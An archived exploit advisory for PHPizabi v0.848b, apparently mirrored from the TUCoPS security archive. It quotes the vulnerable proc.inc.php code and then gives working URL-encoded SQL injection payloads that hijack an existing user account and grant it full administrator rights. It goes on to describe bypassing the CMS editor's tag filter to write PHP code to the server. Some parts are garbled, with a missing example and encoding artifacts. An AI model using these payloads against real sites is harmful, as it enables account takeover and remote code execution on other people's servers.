TUCoPS :: HP Unsorted P :: va2963.htm

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)



--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site: http://retrogod.altervista.org/ 
software site: http://www.phpizabi.net/ 
--------------------------------------------------------------------------------

vulnerability:
sql injection in /theme/default/proc.inc.php

 LoadThis($buffer);
		// HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
		if (isset($_GET["notepad_body"])) {
			myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
			me("flush");
		}
..

note urldecode() ...

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user% 

2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=% 

20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index 

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file} 

use this opening and closing tag style, example:



(it is always availiable, see:http://www.php.net/manual/en/language.basic-syntax.phpmode.php) 
because of that preg_replace() in /modules/admin/cms/edit.php :

..
	if (isset($_POST["Submit"])) {
		if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {
		=09
			$body 				"\n"
				.preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
				."\n";
			;
		=09
			fwrite($handle, $body);
			fclose($handle);
..

which is bypassed.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_ 

to see the output...

now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs 

..
--------------------------------------------------------------------------------

original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH